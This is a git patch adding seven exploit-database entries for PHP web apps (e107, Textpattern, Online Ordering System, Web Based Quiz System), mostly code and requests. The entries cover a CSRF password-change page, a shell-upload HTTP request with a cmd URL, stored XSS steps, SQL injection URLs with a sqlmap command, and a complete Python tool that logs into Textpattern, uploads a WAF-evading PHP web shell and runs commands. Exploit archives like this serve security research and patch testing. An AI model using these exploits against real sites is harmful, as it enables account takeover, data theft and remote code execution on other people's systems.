From 557267457676a499cc10519d401fb3c2b305dfb2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 5 Mar 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-03-05 8 changes to exploits/shellcodes e107 CMS 2.3.0 - CSRF Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS) Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS) Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated) Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated) Textpattern 4.8.3 - Remote code execution (Authenticated) (2) --- exploits/php/webapps/47289.txt | 1 + exploits/php/webapps/49614.txt | 70 ++++++++++++++++++++++ exploits/php/webapps/49615.txt | 79 +++++++++++++++++++++++++ exploits/php/webapps/49616.txt | 18 ++++++ exploits/php/webapps/49617.txt | 18 ++++++ exploits/php/webapps/49618.txt | 19 ++++++ exploits/php/webapps/49619.txt | 18 ++++++ exploits/php/webapps/49620.py | 104 +++++++++++++++++++++++++++++++++ files_exploits.csv | 7 +++ 9 files changed, 334 insertions(+) create mode 100644 exploits/php/webapps/49614.txt create mode 100644 exploits/php/webapps/49615.txt create mode 100644 exploits/php/webapps/49616.txt create mode 100644 exploits/php/webapps/49617.txt create mode 100644 exploits/php/webapps/49618.txt create mode 100644 exploits/php/webapps/49619.txt create mode 100755 exploits/php/webapps/49620.py diff --git a/exploits/php/webapps/47289.txt b/exploits/php/webapps/47289.txt index da318036f..0919e5796 100644 --- a/exploits/php/webapps/47289.txt +++ b/exploits/php/webapps/47289.txt @@ -4,6 +4,7 @@ # Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547 # Version: 3.5 # CWE : CWE-79 +# CVE: CVE-2020-23518 [Description] diff --git a/exploits/php/webapps/49614.txt b/exploits/php/webapps/49614.txt new file mode 100644 index 000000000..561f7f51b --- /dev/null +++ b/exploits/php/webapps/49614.txt @@ -0,0 +1,70 @@ +# Exploit Title: e107 CMS 2.3.0 - CSRF +# Date: 04/03/2021 +# Exploit Author: Tadjmen +# Vendor Homepage: https://e107.org +# Software Link: https://e107.org/download +# Version: 2.3.0 +# Tested on: Windows 10 +# CVE : CVE-2021-27885 + +CSRF vulnerability on e107 CMS + +## Bug Description +Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link. + +## How to Reproduce +Steps to reproduce the behavior: +1. Create a CSRF login POC using the following code. + +``` + + + + +Cross Site Request Forgery (Edit Existing Admin details) + + + + + +

Cross Site Request Forgery (Edit Existing Admin details)

+ +
+ + + + + + + + + + + + + + +
+ + + +``` + + +2. Replace the email and password with the valid credentials. +3. Send the link script to the victim (admin) to make them click. +4. Login with new admin password \ No newline at end of file diff --git a/exploits/php/webapps/49615.txt b/exploits/php/webapps/49615.txt new file mode 100644 index 000000000..0f3572481 --- /dev/null +++ b/exploits/php/webapps/49615.txt @@ -0,0 +1,79 @@ +# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution +# Date: 04/03/2021 +# Exploit Author: Suraj Bhosale +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html +# Version: 1.0 +# Tested on Windows 10, XAMPP + + +Request: +======== + +POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) +Gecko/20100101 Firefox/85.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +boundary=---------------------------14955282031852449676680360880 +Content-Length: 972 +Origin: http://localhost +Connection: close +Referer: http://localhost/onlineordering/GPST/store/index.php +Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir +Upgrade-Insecure-Requests: 1 + +-----------------------------14955282031852449676680360880 +Content-Disposition: form-data; name="transnum" + +VAF-XAP +-----------------------------14955282031852449676680360880 +Content-Disposition: form-data; name="select1" + +25 +-----------------------------14955282031852449676680360880 +Content-Disposition: form-data; name="pname" + +keychain +-----------------------------14955282031852449676680360880 +Content-Disposition: form-data; name="select2" + +1 +-----------------------------14955282031852449676680360880 +Content-Disposition: form-data; name="txtDisplay" + +25 +-----------------------------14955282031852449676680360880 +Content-Disposition: form-data; name="note" + +test +-----------------------------14955282031852449676680360880 +Content-Disposition: form-data; name="image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------14955282031852449676680360880-- + +Response: +========= + +HTTP/1.1 200 OK +Date: Thu, 04 Mar 2021 13:28:27 GMT +Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27 +X-Powered-By: PHP/7.3.27 +Content-Length: 55 +Connection: close +Content-Type: text/html; charset=UTF-8 + + + +# Uploaded Malicious File can be Found in : +onlineordering\GPST\store\design + +# go to +http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname +which will execute hostname command. \ No newline at end of file diff --git a/exploits/php/webapps/49616.txt b/exploits/php/webapps/49616.txt new file mode 100644 index 000000000..d65735908 --- /dev/null +++ b/exploits/php/webapps/49616.txt @@ -0,0 +1,18 @@ +# Exploit Title: Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS) +# Date: 2021-03-04 +# Exploit Author: Tushar Vaidya +# Vendor Homepage: https://textpattern.com +# Software Link: https://textpattern.com/start +# Version: v 4.8.4 +# Tested on: Windows + +Steps-To-Reproduce: +1. Login into Textpattern CMS admin panel. +2. Now go to the *Content > C**omments > Message*. +3. Now paste the below payload in the URL field. + +Ba1man”> + +4. Now click on the *Save* button. +5. Now go to the https://site.com/articles/welcome-to-your-site#comments-head +5. The XSS will be triggered. \ No newline at end of file diff --git a/exploits/php/webapps/49617.txt b/exploits/php/webapps/49617.txt new file mode 100644 index 000000000..0ac1c8698 --- /dev/null +++ b/exploits/php/webapps/49617.txt @@ -0,0 +1,18 @@ +# Exploit Title: Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS) +# Date: 2021-03-04 +# Exploit Author: Tushar Vaidya +# Vendor Homepage: https://textpattern.com +# Software Link: https://textpattern.com/start +# Version: v 4.9.0-dev +# Tested on: Windows + +Steps-To-Reproduce: +1. Login into Textpattern CMS admin panel. +2. Now go to the *Content > Write > ** Excerpt*. +3. Now paste the below payload in the URL field. + +Ba1man”> + +4. Now click on the *Save* button. +5. Now go to the *articles* page +5. The XSS will be triggered. \ No newline at end of file diff --git a/exploits/php/webapps/49618.txt b/exploits/php/webapps/49618.txt new file mode 100644 index 000000000..fe54cab72 --- /dev/null +++ b/exploits/php/webapps/49618.txt @@ -0,0 +1,19 @@ +# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated) +# Date: 2021-03-04 +# Exploit Author: Suraj Bhosale +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html +# Version: v1.0 +# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9 +# Vulnerable Parameter: id + +*Steps to Reproduce:* +1) Visit +http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response. +2) Now fire up the following command into SQLMAP. + +CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9 +* +--batch --dbs + +3) Using the above command we will get the name of all the database. \ No newline at end of file diff --git a/exploits/php/webapps/49619.txt b/exploits/php/webapps/49619.txt new file mode 100644 index 000000000..f6431728f --- /dev/null +++ b/exploits/php/webapps/49619.txt @@ -0,0 +1,18 @@ +# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated) +# Date: 04-03-2021 +# Exploit Author: Deepak Kumar Bharti +# Vendor Homepage: https://www.sourcecodester.com +# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html +# Software: Web Based Quiz System +# Version: 1.0 + +# Tested on: Windows 10 Pro +# Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe +# in Welcome page in quiz section eid parameter affected from this vulnerability. +# URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34 + +POC: +# go to url http://localhost/login.php +# then you have to login with default creds +# then go to quiz and execute the payload ie:-- +http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34 \ No newline at end of file diff --git a/exploits/php/webapps/49620.py b/exploits/php/webapps/49620.py new file mode 100755 index 000000000..68f79e1eb --- /dev/null +++ b/exploits/php/webapps/49620.py @@ -0,0 +1,104 @@ +# Exploit Title: Textpattern 4.8.3 - Remote code execution (Authenticated) (2) +# Date: 03/03/2021 +# Exploit Author: Ricardo Ruiz (@ricardojoserf) +# Vendor Homepage: https://textpattern.com/ +# Software Link: https://textpattern.com/start +# Version: Previous to 4.8.3 +# Tested on: CentOS, textpattern 4.5.7 and 4.6.0 +# Install dependencies: pip3 install beautifulsoup4 argparse requests +# Example: python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d + +import sys +import argparse +import requests +from bs4 import BeautifulSoup + + +def get_args(): + parser = argparse.ArgumentParser() + parser.add_argument('-t', '--target', required=True, action='store', help='Target url') + parser.add_argument('-u', '--user', required=True, action='store', help='Username') + parser.add_argument('-p', '--password', required=True, action='store', help='Password') + parser.add_argument('-c', '--command', required=False, default="whoami", action='store', help='Command to execute') + parser.add_argument('-f', '--filename', required=False, default="testing.php", action='store', help='PHP File Name to upload') + parser.add_argument('-d', '--delete', required=False, default=False, action='store_true', help='Delete PHP file after executing command') + my_args = parser.parse_args() + return my_args + + +def get_file_id(s, files_url, file_name): + r = s.get(files_url, verify=False) + soup = BeautifulSoup(r.text, "html.parser") + for a in soup.findAll('a'): + if "file_download/" in a['href']: + file_id_name = a['href'].split('file_download/')[1].split("/") + if file_id_name[1] == file_name: + file_id = file_id_name[0] + return file_id + + +def login(login_url, user, password): + s = requests.Session() + s.get(login_url, verify=False) + data = {"p_userid":user, "p_password":password, "_txp_token":""} + r = s.post(login_url, data=data, verify=False) + if str(r.status_code) == "401": + print("[+] Invalid credentials") + sys.exit(0) + _txp_token = "" + soup = BeautifulSoup(r.text, "html.parser") + fields = soup.findAll('input') + for f in fields: + if (f['name'] == "_txp_token"): + _txp_token = f['value'] + return s,_txp_token + + +def upload(s, login_url, _txp_token, file_name): + php_payload = 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.\n'*1000 # to avoid WAF problems + php_payload += '' + s.post(login_url, files=(("MAX_FILE_SIZE", (None, "2000000")), ("event", (None, "file")), ("step", (None, "file_insert")), ("id", (None, "")), ("sort", (None, "")), ("dir", (None, "")), ("page", (None, "")), ("search_method", (None, "")), ("crit", (None, "")), ("thefile",(file_name, php_payload, 'application/octet-stream')), ("_txp_token", (None, _txp_token)),), verify=False) + + +def exec_cmd(s, cmd_url, command): + r = s.get(cmd_url+command, verify=False) + response = r.text.replace("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.\n","") + return response + + +def delete_file(s, login_url, file_id, _txp_token): + data = {"selected[]":file_id,"edit_method":"delete","event":"file","step":"file_multi_edit","page":"1","sort":"filename","dir":"asc","_txp_token":_txp_token} + s.post(login_url, data=data, verify=False) + + +def main(): + args = get_args() + url = args.target + user = args.user + password = args.password + file_name = args.filename + command = args.command + delete_after_execute = args.delete + + login_url = url + "/textpattern/index.php" + upload_url = url + "/textpattern/index.php" + cmd_url = url + "/files/" + file_name + "?cmd=" + files_url = url + "/textpattern/index.php?event=file" + + s,_txp_token = login(login_url, user, password) + print("[+] Logged in") + upload(s, login_url, _txp_token, file_name) + file_id = get_file_id(s, files_url, file_name) + print("[+] File uploaded with id %s"%(file_id)) + response = exec_cmd(s, cmd_url, command) + print("[+] Command output \n%s"%(response)) + + if delete_after_execute: + print("[+] Deleting uploaded file %s with id %s" %(file_name, file_id)) + delete_file(s, login_url, file_id, _txp_token) + else: + print("[+] File not deleted. Url: %s"%(url + "/files/" + file_name)) + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 883ad68a4..7ae944904 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43800,3 +43800,10 @@ id,file,description,date,author,type,platform,port 49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php, 49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",2021-03-03,"Tushar Vaidya",webapps,php, 49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",2021-03-03,"Tushar Vaidya",webapps,php, +49614,exploits/php/webapps/49614.txt,"e107 CMS 2.3.0 - CSRF",2021-03-04,Tadjmen,webapps,php, +49615,exploits/php/webapps/49615.txt,"Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution",2021-03-04,"Suraj Bhosale",webapps,php, +49616,exploits/php/webapps/49616.txt,"Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php, +49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php, +49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php, +49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",2021-03-04,"Deepak Kumar Bharti",webapps,php, +49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,